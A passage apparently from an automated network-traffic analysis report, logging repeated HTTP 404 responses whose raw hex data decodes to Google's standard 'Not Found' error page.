74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 